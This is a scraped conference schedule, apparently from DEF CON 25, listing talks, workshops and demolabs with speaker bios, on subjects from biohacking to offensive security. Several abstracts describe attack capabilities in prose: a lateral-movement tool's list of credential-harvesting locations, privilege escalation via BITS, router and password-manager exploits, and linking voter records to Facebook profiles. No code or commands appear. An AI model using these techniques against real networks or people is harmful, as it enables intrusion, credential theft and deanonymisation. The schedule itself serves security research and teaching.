Jeffrey Tibbetts is a Biohacker, blogger, body mod artist and nurse out of Southern California. He’s been a collaborator on projects ranging from insufflatable peptides that extend REM sleep to non-Newtonian armor implants. He placed 3rd in the Biohack Village Oxytocin Poker Tournament and performed an implant on transhumanist presidential candidate Zoltan Istvan. Jeff hosts the annual event “Grindfest” in Tehachapi, California, which the New York Times states is for “the real transhumanists.” He shares his lab space with two fantastic cats, Chango and Grumpus, as well as two merely acceptable cats, Binky and Mildew.

Abstract:
Over the past decade, the ways we pursue human improvement have become increasingly invasive. We’ve so far been fortunate, but it’s likely if not inevitable that a death will occur due to biohacking. This presentation discusses the many precautions being taken by biohackers to make our procedures and projects as safe as possible.



Return to Index      -     

 

BHV - Pisa Room - Sunday - 14:00-14:59


Title: Biohacking Street Law

Speaker: Victoria Sutton

About Victoria:
Victoria Sutton, MPA, PhD, JD
Paul Whitfield Horn Professor
Associate Dean for Research and Faculty Development
Director, Center for Biodefense, Law and Public Policy
Director, Science, Engineering and Technology Law Concentration Program
Director, Dual Degree Programs in Science, Engineering and Technology
Founding Editor, Journal for Biosecurity, Biosafety and Biodefense Law


This session will give you some basic tips for avoiding violating the law, and some preventive tips for avoiding potential legal traps if you are a biohacker. Biohacking, in this session, includes body devices, genetic engineering, synthetic biology and laboratory practices. The session will begin with some examples of why you need to know about law for biohackers and discuss legal cases useful for biohackers. The second part of the session will be a workshop-style segment applying these rules for biohackers.



Return to Index      -     

 

BHV - Pisa Room - Friday - 10:05-10:30


Title: Biohacking: The Moral Imperative to Build a Better You

Speaker: Tim Cannon

About Tim:
Tim Cannon is an American software developer, entrepreneur, and biohacker based in Pittsburgh, Pennsylvania. He is best known as the co-founder and Chief Information Officer of Grindhouse Wetware, a biotechnology startup company that creates technology to augment human capabilities.

Cannon has spoken at conferences around the world on the topics of human enhancement, futurism, and citizen science, including at TEDx Rosslyn, FITUR, the University of Maryland, the World Business Dialogue, the Medical Entrepreneur Startup Hospital, and others. He has been published in Wired and featured in television shows such as National Geographic Channel’s Taboo and "The Big Picture with Kal Penn". Tim has been featured on podcasts including Ryan O'Shea's Future Grind and Roderick Russell's Remarkably Human.

Abstract:
The talk will focus on biohacking as not just an ethically grey zone but instead present the idea that biohacking is not just something we would like to see, but is something we must do if we are ever going to be capable of living up to the morals we espouse.



Return to Index      -     

 

BHV - Pisa Room - Saturday - 15:00-15:29


Title: Biotechnology Needs a Security Patch...Badly

Speaker: Ed You


About Ed:
Covert FBI super squirrel, loves working with legos, haikus, and playing handball with cement spheres. Ask him about his time in Panama; Spanish is his third fluent language, followed by sarcasm.

Abstract:
What talk? It's going to be a theatrical song and interpretive dance related to the 5 W's and how to fix our bio economy. You get it, I know you do.



Return to Index      -     

 

DEFCON - Track 3 - Sunday - 10:20-10:40


BITSInject

Sunday at 10:20 in Track 3

20 minutes | Demo, Tool

Dor Azouri Security researcher, @SafeBreach

Windows' BITS service is a middleman for your download jobs. You start a BITS job, and from that point on, BITS is responsible for the download. But what if we tell you that BITS is a careless middleman? We have uncovered the way BITS maintains its jobs queue using a state file on disk, and found a way for a local administrator to control jobs using special modifications to that file.

Comprehending this file's binary structure allowed us to change a job's properties (such as RemoteURL, Destination Path...) in runtime and even inject our own custom job, using none of BITS' public interfaces. This method, combined with the generous notification feature of BITS, allowed us to run a program of our will as the LocalSystem account, within session 0. So if you wish to execute your code as NT AUTHORITY/SYSTEM and the first options that come to mind are psexec/creating a service, we now add a new option: BITSInject.

Here, we will not only introduce the practical method we formed, but also reveal the binary structure of the state file for you to play with, and some knowledge we gathered while researching the service flow.

We will also provide free giveaways: a one-click Python tool that performs the described method; SimpleBITSServer, a Pythonic BITS server; and a struct definition file, to use for parsing your BITS state file.

Dor Azouri
Dor Azouri is a security professional, having 6+ years of unique experience with network security, malware research and infosec data analysis. Currently doing security research @SafeBreach.


Return to Index      -     

 

Night Life - Octavius 3&4 - Saturday - 21:00-26:00


Title:
Blanketfort Con

I'm sorry, did you not read the name of this party? Seriously, why are you even thinking about it? You know you're coming. Bring your blankets and your sense of adventure, it's Blanketfort Con.
Return to Index      -     

 

BHV - Pisa Room - Friday - 16:00-16:29


Title: Blockchain's Role in the Disruption of the Medical Industry

Speakers: John Bass

About John:
John Bass is the Founder and CEO of Hashed Health, a healthcare technology innovation company focused on accelerating the realization of blockchain and distributed ledger technologies. John has over 20 years of experience in healthcare technology with expertise in collaborative platforms, patient engagement, systems integration, supply chain, clinical performance and value-based payments.
Prior to Hashed Health, John was CEO at InVivoLink, a surgical patient registry and care management start-up, acquired by HCA in 2015. John’s experience also includes healthcare B2B startup empactHealth.com which was acquired by Medibuy / Global Healthcare Exchange. John is a native of Nashville and has a Chemistry degree from the University of North Carolina, Chapel Hill.

Abstract:
Over the next ten years, blockchain and distributed ledger technologies will fundamentally change the delivery of care around the globe. The blockchain provides a technical framework where trust is moved from central controlling intermediaries to the open source protocol, freeing data and assets from the control of traditional corporate interests. The great hope is that this evolution will result in the empowerment of consumers, communities, and markets centered on sustainable wellness and environments of health. The coming years represent a unique opportunity to make sure blockchain-based global health initiatives are structured in a way that re-constructs our broken system in a way that improves the lives of individuals and the communities in which they live.



Return to Index      -     

 

CPV - Florentine Ballroom 4 - Saturday - 17:00-17:30


Title:
Blue Team TLS Hugs

Author:
Lee Brotherston

Abstract:
TLS, and its older forerunner SSL, are used to maintain the confidentiality and integrity of network communications. This is a double edged sword for Information Security departments as this allows private information to remain private, but can also be used to hide malicious activity.

Current defensive measures for dealing with network traffic encrypted using TLS typically take one of two forms:

- Attempting to detect malicious activities via other means which are outside of the encrypted session, such as endpoint security tools and IP address blacklists.

- Breaking the TLS trust model by effectively attacking all connections, including trusted connections, via MiTM with a trusted certificate. (yes AV vendors, I'm looking at you)

This talk discusses (ok maybe rants about) the problems with the current "state of the art" and introduces other techniques, such as TLS Fingerprinting and TLS Handshake Mangling, which can be used to solve the same problems with less of the issues of current systems.

Bio:
Lee Brotherston is a Director of Security for a startup in the Toronto area. Having spent nearly 20 years in Information Security, Lee has worked as an Internal Security resource across many verticals including Finance, Telecommunications, Hospitality, Entertainment, and Government in roles ranging from Engineer to IT Security Manager.

He's also old enough to have done computering on a Commodore 64.
Twitter handle of presenter(s): @synackpse

Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 4 - Thursday - 14:30-18:30


Brainwashing Embedded Systems

Thursday, 14:30 to 18:30 in Octavius 4

Craig Young Security Researcher, Tripwire

Lane Thames Security Researcher, Tripwire

Jiva Security Research Engineer, Tripwire

Learning the secret incantations to make embedded systems carry out your will is not as hard as one might think. In the world of IoT, the hardened system is rare and most times a firmware image is more than enough to find and exploit weakness. This session explains in detail a process for going from zero-knowledge to zero-day on real-world devices without breaking a sweat. Attendees to this tutorial session will learn the ropes of firmware dissection, app decompilation, and manual fuzz testing in a hands-on hack lab. Participants will be provided with a customized Kali Linux virtual appliance and given access to several consumer devices for analysis. These techniques have been successfully employed by the author to identify over 100 CVEs on embedded/IoT devices as well as to win the 0-day and CTF tracks in the DEF CON 22 SOHOpelessly Broken router hacking competition.

Prerequisites: Intermediate *nix knowledge; proficiency with a shell (including writing BASH or similar scripts); strong understanding of HTTP. Familiarity with tools for working with HTTP is a big plus (e.g. cURL, Burp, urllib, etc.)

Materials: Nothing is required, but in order to make the most out of the workshop, students will want to have a laptop with an 802.11 adapter and virtualization software capable of running an x86_64 virtual machine from an OVA/OVF (e.g. VirtualBox or VMware). Virtual machine files will be made available for download from the Internet before the workshop and it is best for participants to load the content in advance. The material will also be available on USB and a local file server.

Max students: 72 | Registration: https://dc25_young.eventbrite.com/ (Sold out!)

Craig Young
Craig Young is a computer security researcher with Tripwire's Vulnerability and Exposures Research Team (VERT). He has identified and responsibly disclosed dozens of vulnerabilities in products from Google, Amazon, IBM, NETGEAR, Adobe, HP, Apple, and others. His research has resulted in numerous CVE assignments and repeated recognition in the Google Application Security Hall of Fame. Craig's presentations on Google authentication weaknesses have led to considerable security improvements for all Google users. Craig won in track 0 and track 1 of the first ever SOHOpelessly Broken contest at DEF CON 22 by demonstrating 10 0-day flaws in SOHO wireless routers. His research into iOS WiFi problems more recently exposed CVE-2015-3728 that could allow devices to inadvertently connect to malicious hot spots. Craig has also successfully employed fuzzing techniques to find flaws in a variety of open source software including a memory corruption in MatrixSSL that could be used to achieve code execution on at least 100,000 Internet gateways.

Lane Thames
Lane Thames is a software development engineer and security researcher with Tripwire's Vulnerability and Exposure Research Team (VERT). As a member of VERT, Lane develops software that detects applications, devices, and operating systems along with vulnerability detection and management software. He also spends time looking for new vulnerabilities, contributing to the Tripwire State of Security blog, and understanding emerging cybersecurity threats. Lane received his PhD in Electrical and Computer Engineering from the Georgia Institute of Technology and has spent over 10 years working in information technology and software/hardware development. Lane worked for nCircle prior to their acquisition, and continues his research work now for Tripwire.

Jiva
Jiva is a Security Research Engineer on the Vulnerability and Exposures Research Team (VERT) at Tripwire. Prior to Tripwire, Jiva worked at Coalfire doing consulting/penetration testing, Dell SecureWorks as a network security analyst, and worked at UGA doing penetration testing on departmental web applications. Jiva went to school at the University of Georgia for a Bachelor's and Master's degree in Computer Science, and is a long time member of the CTF teams disekt and SecDawgs.


Return to Index      -     

 

DEFCON - Track 3 - Sunday - 10:00-10:30


Breaking Bitcoin Hardware Wallets

Sunday at 10:00 in Track 3

20 minutes | Demo, Exploit

Josh Datko Principal Engineer, Cryptotronix LLC

Chris Quartier Embedded Engineer, Cryptotronix, LLC

The security of your bitcoins rests entirely in the security of your private key. Bitcoin hardware wallets help protect against software-based attacks to recover or misuse your key. However, hardware attacks on these wallets are not as well studied. In 2015, Jochen Hoenicke was able to extract the private key from a TREZOR using a simple power analysis technique. While that vulnerability was patched, he suggested the microcontroller on the TREZOR, which is also the same on the KeepKey, may be vulnerable to additional side channel attacks.

In this presentation we will quickly overview fault injection techniques, timing, and power analysis methods using the Open Source Hardware tool, the ChipWhisperer. We then show how to apply these techniques to the STM32F205 which is the MCU on the Trezor and KeepKey. Lastly, we will present our findings of a timing attack vulnerability and conclude with software and hardware recommendations to improve bitcoin hardware wallets. We will show and share our tools and methods to help you get started in breaking your own wallet!

Josh Datko
Josh Datko is the owner of Cryptotronix, an embedded security consultancy. As a submarine officer, he was sent to Afghanistan to ensure that the Taliban did not develop a submarine force—mission accomplished! He wrote a book on BeagleBones and crypto hardware which not many people have read, talked about embedded security at Portland BSides and HOPE, and presented a better way to make a hardware implant at DEF CON 22 which hopefully helped the NSA improve their spying.

Chris Quartier
Chris is the lead embedded hacker at Cryptotronix. He has worked at both big companies and IoT startups as an embedded developer working on bare metal and embedded Linux board bring-up, driver development, and trying to get those little logic analyzer clips to stay connected to a target. He's hacked on radios, rail guns, and fitness trackers but not all at the same time.


Return to Index      -     

 

DEFCON - Track 3 - Friday - 14:00-14:45


Breaking the x86 Instruction Set

Friday at 14:00 in Track 3

45 minutes | Demo, Tool

Christopher Domas Security Researcher, Battelle Memorial Institute

A processor is not a trusted black box for running code; on the contrary, modern x86 chips are packed full of secret instructions and hardware bugs. In this talk, we'll demonstrate how page fault analysis and some creative processor fuzzing can be used to exhaustively search the x86 instruction set and uncover the secrets buried in your chipset. We'll disclose new x86 hardware glitches, previously unknown machine instructions, ubiquitous software bugs, and flaws in enterprise hypervisors. Best of all, we'll release our sandsifter toolset, so that you can audit - and break - your own processor.

Christopher Domas
Christopher Domas is a cyber security researcher and embedded systems engineer, currently investigating low level processor exploitation. He is best known for releasing impractical solutions to non-existent problems, including the world's first single instruction C compiler (M/o/Vfuscator), toolchains for generating images in program control flow graphs (REpsych), and Turing-machines in the vi text editor. His more relevant work includes the binary visualization tool ..cantor.dust.. and the memory sinkhole x86 privilege escalation exploit.

@xoreaxeaxeax


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Friday - 14:00-15:00


Title:
Breaking TLS: A Year in Incremental Privacy Improvements

Author:
Andrew Brandt (Symantec)

Abstract:
I run a lab in which I let a lot of computers, as well as networked "IoT" devices, phone home, and then I use enterprise-level tools to decrypt and capture that TLS/SSL network traffic. In the past year, I've been observing a steady increase in the number of devices and services which flat-out refuse to let me decrypt their communications - an unequivocally Good Thing for privacy and security. But I've also witnessed some disastrous problems, such as large corporations, who should know better, behaving badly, using self-signed or expired certificates for critical sites used to, for instance, deliver firmware updates.

In this overview, I'll discuss the good, bad, and really, really ugly things I've learned about what, how, and to whom these devices communicate, and in some cases, the contents of those communications. I'll also provide an overview of the tools and techniques I've used to re-sign certificates and capture the decrypted data, including how (and why) you can (and probably should) do this yourself. Finally, I plan to offer my own manifesto to businesses large and small about how they should do a much better job at protecting the privacy of their customers.

Bio:
Andrew Brandt is the Director of Threat Research for Symantec, whose previous employer was acquired in the past year. In his role, he runs a malware research lab in which he infects all manner of devices with malware and permits the devices to phone home, in order to learn more about how, and to whom, malware communicates.
Twitter handle of presenter(s): @threatresearch

Return to Index      -     

 

DEFCON - Track 1 - Saturday - 10:20-10:40


Breaking Wind: Adventures in Hacking Wind Farm Control Networks

Saturday at 10:20 in 101 Track

20 minutes

Jason Staggs Security Researcher at the University of Tulsa

Wind farms are becoming a leading source for renewable energy. The increased reliance on wind energy makes wind farm control systems attractive targets for attackers. This talk explains how wind farm control networks work and how they can be attacked in order to negatively influence wind farm operations (e.g., wind turbine hijacking). Specifically, implementations of the IEC 61400-25 family of communications protocols are investigated (i.e., OPC XML-DA). This research is based on an empirical study of a variety of U.S. based wind farms conducted over a two year period. We explain how these security assessments reveal that wind farm vendor design and implementation flaws have left wind turbine programmable automation controllers and OPC servers vulnerable to attack. Additionally, proof-of-concept attack tools are developed in order to exploit wind farm control network design and implementation vulnerabilities.

Jason Staggs
Dr. Jason Staggs is an independent information security researcher with strong interests in critical infrastructure protection, telecommunications, penetration testing, network security and digital forensics. Jason has spoken at national and international conferences, authored various peer-reviewed publications and lectured undergraduate and graduate level courses on a variety of cyber security topics. His expertise in digital forensics has enabled him to provide invaluable assistance to law enforcement agencies at the local, state and federal levels in order to solve high-profile cybercrimes. In his spare time, Jason enjoys reverse engineering proprietary network stacks in embedded devices and diving through ancient RFCs to demystify obscure network protocols. Jason attended graduate school at The University of Tulsa where he earned his M.S. and Ph.D. degrees in Computer Science.


Return to Index      -     

 

VMHV - Roman 1, Promenade Level - Friday - 13:00-13:45


Title:
Brief history of election machine hacking and lessons learned so far and why it is hard to tell the difference between incompetence and malice.

Harri Hursti is a Finnish computer programmer and former Chairman of the Board and co-founder of ROMmon, where he supervised the development of the world's smallest 2 gigabit traffic analysis product, which was later acquired by F-Secure Corporation.
Hursti is well known for participating in the Black Box Voting hack studies, along with Dr. Herbert Hugh Thompson. The memory card hack demonstrated in Leon County is popularly known as the Hursti Hack. This hack was part of a series of four voting machine hacking tests organized by the nonprofit election watchdog group Black Box Voting in collaboration with the producers of HBO documentary, Hacking Democracy. The studies proved serious security flaws in the voting systems of Diebold Election Systems.

Return to Index      -     

 

Demolabs - Table 5 - Saturday - 14:00-15:50


Bropy

Matt Domko

Saturday from 1400-1550 at Table Five

Provides simple anomaly-based IDS capabilities using Bro. Bropy parses logs to generate network baselines using a simple Y/N interface, and the accompanying Bro script generates logs for traffic outside of the baseline.

https://github.com/hashtagcyber/bropy

Matt Domko
"I'm just a guy playing with Legos. I crudely assemble the knowledge I have to build a solution for my problems."

Matt Domko is currently an Information Security instructor for Chiron Technology Services in Augusta, Georgia. His experiences as an enterprise administrator and cyber network defender for the United States Army are what drive his passion for network defense and "Blue Teaming". Bikes, Beards, and Karaoke


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 7 - Thursday - 10:30-14:30


Build your stack with Scapy, for fun and profit

Thursday, 10:30 to 14:30 in Octavius 7

stryngs

Jack64

zero-x

802.11 is still the Wild West in 2017. It has been around since the 90's, yet as most things with the Internet, security has always been a bolt-on addition. Through passive and active observations over the past couple years, it occurred to us that a workshop on how to abuse wifi would be interesting. This in and of itself is a spiderweb. There are so many ways to approach it; jam it, DOS it, crack it, so forth and so on.

We decided on the "ride the wave" approach. Take the existing infrastructure, and use it to your advantage by molding custom frames as you see fit. We feel this is underutilized and thus: demonstrations, beatings and examples should be given. ARP, ARP, ARP, who let the ARPs out. That is typically the battle cry for anything "LAN" these days. Pop the network, hop on the network, do your ARP, grab your MITM and go. Tried and true, it works, but it's outdated, oldskool and quite frankly, boring. Any hacker worth their salt should be able to arpspoof and ettercap. Any WIDS/WIPS should instantly lock on to what's going on and ban or alert accordingly. What we need is a new approach.

Enter, Scapy. Without spending an hour on the wonders of Scapy and what it can do for you as a Pentester in this briefing, we'd quite frankly rather cut down to the nuts and bolts, and just, show you.

This workshop is going to center around Scapy and how you as a Pentester can use it to your advantage. Take the 802.11 and bend it to your will. Make it do your bidding and leave the SysAdmins scratching

Prerequisites: Familiarity with RFC 1149

Materials:
- Laptop with bootable Linux of some variety
- Debian based is preferred
- apt is way easier than yum...
- WiFi NIC with Monitor Mode capability
- Curiosity

Max students: 85 | Registration: https://dc25_stryngs.eventbrite.com/ (Sold out!)

stryngs
stryngs has been into the scene since 2006 when he first discovered wifi. Since then he has learned and absorbed all he can. He has bothered many a person on the IRC. Though he might have perturbed you with his questions, he is grateful for the knowledge you bestowed upon him. Without the community, stryngs wouldn't be where he is today. As such, hopefully with this workshop, he is truly giving back to the community which brought him to where he is at today.

Jack64
João Pena Gil (Jack64) is a computer security researcher from Portugal, working in the field since 2015. Currently working at Checkmarx as the AppSec Analysis Team Leader by day and a Cobalt Core Researcher by night, Jack64's interests are broad in information security, ranging from networking protocols to application security and cryptography. Stryngs had a big influence in Jack64's interest in information security, sharing with him his proof-of-concept for airpwn-ng, which prompted Jack64 to learn more about 802.11 and the rest of the networking stack in general, leveraging the powerful capabilities of scapy and python. This is some of the knowledge he hopes to share in this workshop.

zero-x
Bio Coming Soon


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 5 - Thursday - 10:30-14:30


Building Application Security Automation with Python

Thursday, 10:30 to 14:30 in Octavius 5

Abhay Bhargav CTO, we45

In an age of rapid-release applications, DevOps and small application security teams, the only way application security can scale is with automation. In this workshop, I will introduce some key automation practices and techniques using Python that students can use in their own application security programs for quick wins. These techniques will predominantly focus on developing automation scripts harnessing APIs from Open Source Web Vulnerability Scanners (like OWASP ZAP), building fuzzers harnessing features of tools like mitmproxy with as little as a few lines of code, and using NoSQL databases for easy search and to generate powerful application security analytics. The session will be entirely hands-on, with a lot of coding and very little theory.

Prerequisites:
Knowledge of Python basics preferred but not required (basic Python skills are good enough; knowledge of variables, loops, modules, imports and data structures would suffice). Examples with complete source code will be given to participants to study further. Hands-on exercises will be "templatized" to ensure that people are up and running quickly, even if they are not familiar with Python.

Materials:
- Laptop with 64-bit CPU (Mac/Win/*nix) with 8GB+ RAM (host machine) preferred, and at least 50GB of free HDD to import a VirtualBox VM
- For Windows laptops, please ensure that virtualization is enabled in the BIOS to run the VM. There have been issues where virtualization being disabled in the BIOS has resulted in the VM not working. Please ensure that you have the necessary permissions to change BIOS settings if required (especially for work/corporate laptops)
- A 64-bit CPU is required. We will be using Docker images, and Docker doesn't support 32-bit systems
- Please have the latest version of VirtualBox installed on the laptop.

Max students: 50 | Registration: https://dc25_bhargav.eventbrite.com (Sold out!)

Abhay Bhargav
Abhay Bhargav is the CTO of we45, a focused Application Security company. Abhay is the author of two international publications, “Secure Java for Web Application Development” and “PCI Compliance: A Definitive Guide”. Abhay is a builder and breaker of applications, and has authored multiple applications in Django and NodeJS. He is a passionate Pythonista and loves the idea of automation in security. This passion prompted him to author the world’s first hands-on Security in DevOps workshop that has been delivered in multiple locations, and recently as a highly successful workshop at the OWASP AppSecUSA 2016, OWASP AppSecEU 2017 and OWASP Appsec USA 2017. In addition, Abhay speaks regularly at industry events including OWASP, ISACA, Oracle OpenWorld, JavaOne, and others.


Return to Index      -     

 

RCV - Palermo room, Promenade level - Sunday - 10:00-10:35


Building Google for Criminal Enterprises

Abstract

I was able to create a proof of concept application that scrubs a recreation of the Ohio Voter Database, which includes first name, last name, date of birth, and home address, and links each entry confidently to its real owner's Facebook page. By doing this I have created a method by which you can use the Voter Database to seed you with name, address and DOB, and Facebook to hydrate that information with personal information.

My application was able to positively link a voter record to a Facebook account approximately 45% of the time. Extrapolate that out over the 6.5 million records in my database and you get 2.86 million Ohio resident Facebook records.

Speaker Profile

Anthony Russell (@DotNetRussell)

https://www.dotnetrussell.com/



Demolabs - Table 2 - Saturday - 14:00-15:50


bullDozer

Keith Lee

Saturday from 1400-1550 at Table Two

Audience: Offense

The tool allows you to supply a username and password that you have captured and cracked from Responder or other sources, as well as an IP range, subnet or list of IP addresses.

The tool finds its way around the network and attempts to gain access to the hosts, finds and dumps the passwords/hashes, and reuses them to compromise other hosts in the network.

Below are some of the places the tool looks for hashes/passwords:
1. SYSVOL
2. File Shares
3. Memory
4. Tokens (Incognito)
5. MSSQL service credentials
6. Unattend.xml, sysprep.xml, sysprep.inf

It will also exploit the Domain Controller if it is vulnerable to MS14-069 and dump the hashes.
Pillaging the Corporate Network
The tool will also attempt to 'rob' the shares and hosts of sensitive data/information:
1. Finding files whose filename has the word 'password' in it
2. Dumping Wireless, WinVNC, UltraVNC, PuTTY, SNMP, Windows AutoLogon and Firefox stored credentials
3. Finding KeePass databases, FileZilla sitemanager.xml, Apache httpd.conf, etc. if they contain credentials
4. Finding PII data and credit card track data in memory
5. Browser credentials

It will iterate and continue to test and exploit the systems until all hosts are compromised. Another useful feature is for attackers who want to find the right credentials in order to access a certain folder under the shares on a host.

For example, \\host1\share\private

You might have an account that allows you to access \\host1\share, but you do not know which account you need to access \\host1\share\private.

Using the credentials it has captured, the tool finds the 'right key' to the lock.

It is possible to disable any of the options (e.g. no memory search for PANs) and to add a random delay to its operations so as to remain stealthy.

We are planning to allow users to develop modules/plugins and encourage development so that its feature set can be extended.

Keith Lee
Keith Lee is a Senior Security Consultant with Trustwave's SpiderLabs Asia-Pacific. SpiderLabs is one of the world's largest specialist security teams, with over 100 consultants spread across North America, South America, Europe and the Asia Pacific. SpiderLabs has a focus on original security research and regularly presents at conferences such as BlackHat, DefCon, OWASP, Hack In The Box and Ruxcon. Keith is based out of Singapore and his primary focus is on providing penetration testing, social engineering and incident response services to clients in the Asia-Pacific region.



RCV - Palermo room, Promenade level - Saturday - 10:00-11:59


Burner Phone Challenge

Abstract

Once upon a time, I saw this tweet from Kenneth Lipp: https://twitter.com/kennethlipp/status/848566661384990722. In summary, the tweet is about an AT&T program available to law enforcement meant to make burner phones meaningless. Even if someone switches phones, if their pattern of behavior (both in terms of contacts and call locations) stays the same or similar, AT&T can determine that it’s the same person simply using a new phone.

This seems like a great teaching opportunity! Attendees at this workshop will build the same analytics as AT&T does, using Python on some “phone metadata” created just for you to play with. You’ll be able to find burner phones in the mess, and hopefully learn some fun network analysis, machine learning, and Python programming skills along the way!

Speaker Profile

Dakota Nelson (@jerkota)

Short: BSLV, SOURCE Boston x2, SOURCE Seattle, other non-security presentations.

Long: http://dakotanelson.com/

https://strikersecurity.com/



DEFCON - Track 2 - Sunday - 13:00-13:45


Bypassing Android Password Manager Apps Without Root

Sunday at 13:00 in Track 2

45 minutes | Demo, Exploit

Stephan Huber Fraunhofer SIT

Siegfried Rasthofer Fraunhofer SIT

Security experts recommend using different, complex passwords for individual services, but everybody knows the issue arising from this approach: it is impossible to keep all the complex passwords in mind. One solution to this issue is password managers, which aim to provide secure, centralized storage for credentials. The rise of mobile password managers even allows users to carry their credentials in their pocket, providing instant access to these credentials when required. This advantage can immediately turn into a disadvantage, as all credentials are stored in one central location. What happens if your device gets lost or stolen, or a hacker gets access to your device? Are your personal secrets and credentials secure?

We say no! In our recent analysis of well-known Android password manager apps, among them products from vendors such as LastPass, Dashlane, 1Password, Avast, and several others, we aimed to bypass their security by either stealing the master password or by directly accessing the stored credentials. Implementation flaws resulted in severe security vulnerabilities. In all of those cases, no root permissions were required for a successful attack. We will explain our attacks in detail. We will also propose possible security fixes and recommendations on how to avoid the vulnerabilities.

Stephan Huber
Stephan Huber is a security researcher at the Testlab mobile security group at the Fraunhofer Institute for Secure Information Technology (SIT). His main focus is Android application security testing and developing new static and dynamic analysis techniques for app security evaluation. He found different vulnerabilities in well-known Android applications and the AOSP. In his spare time he enjoys teaching students in Android hacking.

Siegfried Rasthofer
Siegfried Rasthofer is a vulnerability- and malware-researcher at Fraunhofer SIT (Germany) and his main research focus is on applied software security on Android applications. He developed different tools that combine static and dynamic code analysis for security purposes and he is the founder of the CodeInspect reverse engineering tool. He likes to break Android applications and found various AOSP exploits. Most of his research is published at top tier academic conferences and industry conferences like DEF CON, BlackHat, HiTB, AVAR or VirusBulletin.



DEFCON - Track 3 - Saturday - 16:00-16:45


CableTap: Wirelessly Tapping Your Home Network

Saturday at 16:00 in Track 3

45 minutes | Demo, Tool, Exploit

Marc Newlin Security Researcher at Bastille Networks

Logan Lamb Security Researcher at Bastille Networks

Chris Grayson Founder and Principal Engineer at Web Sight.IO

We discovered a wide array of critical vulnerabilities in ISP-provided, RDK-based wireless gateways and set-top boxes from vendors including Cisco, Arris, Technicolor, and Motorola. Our research shows that it was possible to remotely and wirelessly tap all Internet and voice traffic passing through the affected gateways, impacting millions of ISP customers.

Imagine for a moment that you want a root shell on an ISP-provided wireless gateway, but you're tired of the same old web vulns. You want choice. Maybe you want to generate the passphrase for the hidden Wi-Fi network, or log into the web UI remotely using hard-coded credentials.

Don't have an Internet connection? Not to worry! You can just impersonate a legitimate ISP customer and hop on the nearest public hotspot running on another customer's wireless gateway. Once online, you can head on over to GitHub and look at the vulnerability fixes that haven't yet been pushed to customer equipment.

In this talk, we will take you through the research process that led to these discoveries, including technical specifics of each exploit. After showcasing some of the more entertaining attack chains, we will discuss the remediation actions taken by the affected vendors.

Marc Newlin
Marc is a wireless security researcher at Bastille, where he discovered the MouseJack and KeySniffer vulnerabilities affecting wireless mice and keyboards. A glutton for challenging side projects, Marc competed solo in two DARPA challenges, placing third in the DARPA Shredder Challenge, and second in the first tournament of the DARPA Spectrum Challenge.

Logan Lamb
Logan joined Bastille Networks in 2014 as a security researcher focusing on applications of SDR to IoT. Prior to joining Bastille Networks, he was a member of CSIR at Oak Ridge National Lab where his focus was on symbolic analysis of binaries and red-teaming critical infrastructure.

Chris Grayson
Christopher Grayson (OSCE) is the founder and principal engineer at Web Sight.IO. In this role he handles all operations, development, and research efforts. Christopher is an avid computing enthusiast hailing from Atlanta, Georgia. Having made a habit of pulling things apart in childhood, Chris has found his professional home in information security. Prior to founding Web Sight.IO, Chris was a senior penetration tester at the security consultancy Bishop Fox, and a research scientist at the Georgia Institute of Technology. During his tenure at these organizations, Chris became a specialist in network penetration testing and in the application of academic tactics to the information security industry, both of which contributed to his current research focus of architecting and implementing high-security N-tier systems. Chris attended the Georgia Institute of Technology where he received a bachelor's degree in computational media, a master's degree in computer science, and where he organized and led the Grey H@t student hacking organization.



DEFCON - Track 1 - Sunday - 14:00-14:45


Call the plumber - you have a leak in your (named) pipe

Sunday at 14:00 in 101 Track

45 minutes | Demo

Gil Cohen CTO, Comsec group

The typical security professional is largely unfamiliar with the Windows named pipes interface, or considers it to be an internal-only communication interface.
As a result, open RPC (135) or SMB (445) ports are typically considered only as potential entry points in "infrastructure" penetration tests.

However, named pipes can in fact be used as an application-level entry vector for well-known attacks such as buffer overflow, denial of service or even code injection attacks and XML bombs, depending on the nature of the service listening on the specific pipe on the target machine.

As it turns out, many popular and widely used Microsoft Windows-based enterprise applications open a large number of named pipes on each endpoint or server on which they are deployed, significantly increasing an environment's attack surface without the organization or end user being aware of the risk.
Since there is a complete lack of awareness of this entry point, organizations have very limited options available to mitigate it, making it a perfect attack target for the sophisticated attacker.

In this presentation we will highlight how named pipes have become a neglected and forgotten external interface. We will show some tools that can help find vulnerable named pipes, discuss the mitigations, and demonstrate the exploitation process on a vulnerable interface.

Gil Cohen
Gil is an experienced application security instructor, architect, consultant and pentester just starting his 12th year in the field.

With past experience in the civilian, government and military cyber security industries, Gil currently serves as the CTO of Comsec Group, in charge of training, research, service lines, methodologies and quality assurance.

With a long-time record as an SQL injection fanatic, Gil was responsible for publishing the "SQL Injection Anywhere" technique in 2010, which is currently in use in a variety of automated scanners on the market, and enables the blind detection and exploitation of potential injections in any part of the SQL statement.

He also has a taste for nostalgia, and has been working for a while on abuses to protocols that software developers would prefer to forget.

@Gilco83
www.facebook.com/gilc83



SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 11:00-11:59


Title:
Catch me leaking your data... if you can...

1100 Saturday
Mike Raggo & Chet Hosmer
@DataHiding @PythonForensics
Catch me leaking your data... if you can...
Organizations remain largely ill-equipped to identify data being exfiltrated from their networks. In this presentation we propose a plethora of methods of covert exfiltration from a network by highlighting exploitable flaws in wired and wireless network protocols while also applying steganographic and decoy techniques. We then outline a mockup environment to simulate an enterprise network and exfiltrate covert data that we capture and save in a PCAP file. At the end of the session we provide access to the downloadable PCAP file to determine who can be the first to identify the covert communication. We will additionally provide the plain-text info to see if anyone can figure out how we did it. Winners will be tweeted out afterwards.


Demolabs - Table 3 - Saturday - 16:00-17:50


CellAnalysis

Pedro Cabrera

Saturday from 1600-1750 at Table Three

Audience: Defensive and mobile security

CellAnalysis is one more tool to be added to the pentester's arsenal. Nowadays we can find other tools intended to find fake cells; most of them use active monitoring, that is, they monitor traffic coming to the SIM card on a smartphone, so only cell attacks on the same network as the SIM card are detected. CellAnalysis offers a different vision: it performs passive traffic monitoring, so it does not require a SIM card or a mobile device, simply an OsmocomBB phone or a compatible SDR device (rtlsdr, usrp, hackrf or bladerf), to start monitoring all the frequencies of the GSM spectrum.

http://www.fakebts.com/

Pedro Cabrera
